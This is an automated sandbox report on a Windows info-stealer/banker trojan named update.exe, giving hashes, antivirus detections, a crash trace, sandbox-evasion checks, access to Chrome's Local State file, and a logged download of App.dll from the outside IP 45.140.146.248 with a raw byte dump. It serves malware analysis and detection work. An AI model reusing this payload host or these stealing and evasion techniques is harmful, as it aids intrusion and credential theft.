Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 8, 2024, 9:37 a.m.	July 8, 2024, 9:48 a.m.

Size	826.0KB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`f8ae25eb2bef827759f8cd837ad85bda`
SHA256	`11cd1472cd1cc75245a148d4e9560bf7f7917443b36dec3f92ed79b8e743b399`
CRC32	`D4576184`
ssdeep	`12288:zKgT0C+p1QJteI+ynEWYgeWYg955/155/Z4ML4nvC66aNAl96acG/Eoz1I+MO/uR:zKe0C+p1QJD05vxP2ltpsj+MO/ucu`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature infoStealer_browser_b_Zero - browser info stealer Network_Downloader - File Downloader Malicious_Packer_Zero - Malicious Packer IsPE64 - (no description) UPX_Zero - UPX packed file Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check

update.exe "C:\Users\test22\AppData\Local\Temp\update.exe"
2556

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
45.140.146.248	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49161 -> 45.140.146.248:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 45.140.146.248:80 -> 192.168.56.101:49161	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ July 8, 2024, 9:37 a.m.	stacktrace: update+0x66570 @ 0x13fea6570 update+0x663f2 @ 0x13fea63f2 update+0x67e15 @ 0x13fea7e15 update+0x70623 @ 0x13feb0623 update+0x6cf9e @ 0x13feacf9e update+0x41ed6 @ 0x13fe81ed6 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521 exception.instruction_r: 48 8b 48 20 48 83 ca ff 48 ff c2 44 38 34 11 75 exception.symbol: update+0x66570 exception.instruction: mov rcx, qword ptr [rax + 0x20] exception.module: update.exe exception.exception_code: 0xc0000005 exception.offset: 419184 exception.address: 0x13fea6570 registers.r14: 0 registers.r15: 0 registers.rcx: 0 registers.rsi: 0 registers.r10: 5367488400 registers.rbx: 0 registers.rsp: 2358464 registers.r11: 2355520 registers.r8: 4294967288 registers.r9: 119 registers.rdx: 5367488400 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0	1	0	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://45.140.146.248/App.dll

Performs some HTTP requests (1 event)

request

GET http://45.140.146.248/App.dll

Steals private information from local Internet browsers (1 event)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (36 events)

Time & API	Arguments	Status	Return
Process32FirstW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: [System Process] process_identifier: 0	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: System process_identifier: 4	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: smss.exe process_identifier: 224	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: csrss.exe process_identifier: 304	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: wininit.exe process_identifier: 352	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: csrss.exe process_identifier: 360	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: winlogon.exe process_identifier: 400	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: services.exe process_identifier: 444	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: lsass.exe process_identifier: 460	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: lsm.exe process_identifier: 468	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: svchost.exe process_identifier: 572	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: svchost.exe process_identifier: 652	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: svchost.exe process_identifier: 724	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: svchost.exe process_identifier: 784	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: svchost.exe process_identifier: 832	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: audiodg.exe process_identifier: 900	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: svchost.exe process_identifier: 992	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: svchost.exe process_identifier: 292	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: spoolsv.exe process_identifier: 324	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: svchost.exe process_identifier: 1048	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: srvany.exe process_identifier: 1284	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: KMService.exe process_identifier: 1436	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: conhost.exe process_identifier: 1448	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: taskhost.exe process_identifier: 1600	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: sppsvc.exe process_identifier: 1820	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: svchost.exe process_identifier: 1896	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: dwm.exe process_identifier: 1260	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: explorer.exe process_identifier: 1452	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: pw.exe process_identifier: 988	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: SearchIndexer.exe process_identifier: 1160	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: SearchProtocolHost.exe process_identifier: 936	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: SearchFilterHost.exe process_identifier: 2000	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: mobsync.exe process_identifier: 2288	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: pw.exe process_identifier: 2332	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: taskhost.exe process_identifier: 2372	1	1
Process32NextW July 8, 2024, 9:37 a.m.	snapshot_handle: 0x0000000000000270 process_name: update.exe process_identifier: 2556	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 8, 2024, 9:37 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 741376 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x0000000180001000 process_handle: 0xffffffffffffffff	1	0	0

An executable file was downloaded by the process update.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile July 8, 2024, 9:37 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $%£AÿaÂ/¬aÂ/¬aÂ/¬¦+jÂ/¬¦,gÂ/¬¦óÂ/¬3ª~Â/¬3ª+oÂ/¬3ª,iÂ/¬¦.bÂ/¬aÂ.¬âÂ/¬ñ«'`Â/¬ñ«/`Â/¬ñ«Ð¬`Â/¬ñ«-`Â/¬RichaÂ/¬PEd½U1]ð" BòðS W<` M ´m (``Ð 883pôp¤pà¤`È.text`@B `.rdataV`F@@.datapI 2b @À.pdataÐ @@.rsrc``"@@.relocôp(@B@VAVAWHì0AñMðLúù H\$PH ¸ H\|$XHcùLd$`L%ÄïÿÿB¼'pVHEµ HÛt HËÿåy IüÅ IüÐÅ IIötIüÐÅ Ld$`H\|$XHÛt HËÿ»y H\$P3ÀHÄ0A_A^^ÃH1A¹ÅPL"&HD$ Hâ%¹èP[¸HÄ0A_A^^ÃÌATAVAWHì@EáMðLúù H\$`H@· Hl$hHt$pHcñH\|$8Ll$0L-ÚîÿÿB¼.pVHE1´ HÛt HËÿûx I¼õÅ I¬õÐÅ EätI¼õÐÅ Ll$0Ht$pHÛt HËÿÖx H\$`3ÀA?H\|$8A.Hl$hHÄ@A_A^A\ÃH0A¹ÅPL,%HD$ Hì$¹èZZ¸HÄ@A_A^A\ÃÌÌÌÌÌÌÌÌÌÌHE3ÉEÁHÀtHAÿÀHÀuõHHÀtHAÿÁHÀuõHÒtxA+ÀxA+ÁA+ÀÃÌÌÌÌÌÌÌÌHÄLH L@PUHì`HXð3íHpèHÙHIIñHxàL`ØMàHcúHÉtÿÀw Lt$0L\|$(ÿëHfíÿÿº¸HÊÿáHÖHËè/ÿÿÿA$9¬$ÁHHÒ±H HÉtfDHHÑHÈHÀuòHHHHH«éqH»A,$l9¬$T©léIýl$p@8{iuHËèbrDý9{(ªLåLl$8l$xffHC MlMítbIEH0·°¾¼ÁpùHHI@ÿðv HÎDðÿDv D¯÷DðD¶¼ýuIMAÆ÷y`Dð\|$pAþ\|$pAÿÇIÄ D;{(\|H´$3íL¤$Ll$8{iuHËèrA<$.éfl$x@8kiuHËèqHD$xDõH°9k( LýfDHC ItHöÖ¹ ÿu NTN<N$N¯ÁD$xHNHÉtÿiu ëÅD$xHNHHÉtÿRu ëÅD$xHN0HÉtÿ;u ëÅD$xHN`HÉtÿ$u ëÅD$xH~@HÿtfffHWHËè$H?HÿuìH~Hÿt+HWHÒtH9«°uB<ÿuHËèðáH?HÿuØAÿÆIÇ D;s(ÿÿÿH´$H«°@8kiuHËèºpD$x.A$éH{HL$xH°ÅD$xHÿt`H×HËè°HÿtCH9«°t H×HËèL-ë-H;»rH;» sHHH»ëHÏè,HHÿu¤D$xH«°.A$é¿ ÕDÍ9S(~DD$LÅLc×HC IDHÀtH@HFÔEÛtB¬ÔÿÂIÀ ;S(\|Ë.E$ë&.H9«¨ÅH9« ~¸A$ë½HKL\|$(Lt$0Ld$@H\|$HHt$PH\$XHÉtÿ s ÅHÄ`]Ã¦:u]:ÌÌÌÌHT$LD$LL$ SVWE3ÉL\$0IÃøH5ëèÿÿfff¶ZH¾Bë0D¶D¶R3Ò·¼F[Aè0t/fff¶AþÈö0pUtS¾ÀHÿÁRèPEÀuÜ¾Ã;Ð\|8·Ç;Ð1EÒtD:u'ICIÃHÿÁAÿÁHT$(HÂHT$(EÒmÿÿÿAÁ_^[ÃÌÌÌÌÌÌH\$Hl$VWAVHì0HúLL$ H¿¾HÙLD$hWÉèÿþÿÿø¶CL5k=HÃ3ö<:LD$`H¾HKèÈþÿÿøYHÃ;.ue¶KHCBö1tVò§HØò¼ò%Ä@¾ÁHÿÃòYËòYÓfnÀ¶óæÀ¶ÈBö0òXÈò\ÌuÕò^Ê¶T$`ëÖT$`¶ÈD$hfnÂóæÀBö1GD$ fw(ÆG+GòXÁòG t¶CHÿÃBö0uò¶Èwù-u½ÿÿÿÿë ù+u9½LL$(LD$$H}½HKèÌýÿÿøuakD$$<HÃD$(¯ÅGëA¦¨ßtÉë,HÿÃ¶Bö0tff¶CH[Bö0uñÆG-À@Æöu 9wÀG,3Àë¸H\$PHl$XHÄ0A^_^ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌHìy(LÙryH$t IEKA[ëA¹¹ÐAÙi=x9A{)DAÿAÆC(Aù¸ëQDOÁAIA÷èDÒAÁúAÂÁèDÐ¸ÛhAùAOÉÿÁiÉQ«÷é¸ëQDÊAÁùAÉÁéDÉAlDiÁA÷èAÂÁúÊAÑÁéÊâÂÁøÁA+ÂÀÃA{+fnÀóæÀò\¬òYÄòH,ÐItyAkC<òAC òYACiÀ`êHcÈòH,ÀH+ÈHÑA{,ItDAiC`êH$fAÇCAÆC,HcÈH+ÑIHÄÃ3ÀIICICICIC IC(AÆC.H$HÄÃÌÌÌÌÌÌÌÌH\$WHì HYHúHCHHÀu[HHH(H8\|LMÀtHSHHÈAÿÐÈHCHë$HT$0HÈÿPxòD$0ÈòYÎòH,ÀHCHÉt3ÀHCHHHÀ~ÆG(3ÀH\$8HÄ _ÃH\$8¸HÄ _ÃÌÌWÀòI f/ÈÆA)r*ònf/Áv request_handle: 0x0000000000cc000c	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

45.140.146.248

Detects VirtualBox through the presence of a device (1 event)

file	UNC\VBoxMiniRdrDN

Detects VMWare through the presence of a registry key (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware Tools

File has been identified by 45 AntiVirus engines on VirusTotal as malicious (45 events)

Bkav	W64.AIDetectMalware
Lionic	Trojan.Win32.ClipBanker.Z!c
Elastic	malicious (high confidence)
Cynet	Malicious (score: 99)
Skyhigh	BehavesLike.Win64.Dropper.ch
ALYac	Gen:Variant.Razy.625064
Cylance	Unsafe
VIPRE	Gen:Variant.Razy.625064
Sangfor	Spyware.Win32.Razy.V21l
K7AntiVirus	Spyware ( 005b581b1 )
BitDefender	Gen:Variant.Razy.625064
K7GW	Spyware ( 005b581b1 )
Cybereason	malicious.b2bef8
Arcabit	Trojan.Razy.D989A8
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win64/Spy.Agent.IX
APEX	Malicious
McAfee	Artemis!F8AE25EB2BEF
Avast	Win64:MalwareX-gen [Trj]
Kaspersky	Trojan-Banker.Win32.ClipBanker.abza
MicroWorld-eScan	Gen:Variant.Razy.625064
Rising	Spyware.Agent!8.C6 (CLOUD)
Emsisoft	Gen:Variant.Razy.625064 (B)
F-Secure	Trojan.TR/AVI.Agent.vfmnb
McAfeeD	ti!11CD1472CD1C
FireEye	Generic.mg.f8ae25eb2bef8277
Sophos	Mal/Generic-S
Ikarus	Trojan.Win64.Spy
Webroot	W32.Malware.Gen
Google	Detected
Avira	TR/AVI.Agent.vfmnb
Gridinsoft	Ransom.Win64.Wacatac.sa
Microsoft	Trojan:Win32/Wacatac.B!ml
ZoneAlarm	Trojan-Banker.Win32.ClipBanker.abza
GData	Gen:Variant.Razy.625064
Varist	W64/ABTrojan.GEFJ-2601
DeepInstinct	MALICIOUS
Malwarebytes	Generic.Malware/Suspicious
TrendMicro-HouseCall	TROJ_GEN.R002H09G624
MAX	malware (ai score=82)
Fortinet	W64/Agent.IX!tr.spy
AVG	Win64:MalwareX-gen [Trj]
Paloalto	generic.ml
CrowdStrike	win/malicious_confidence_70% (D)
alibabacloud	Trojan[spy]:Win/Razy.Gen

update.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All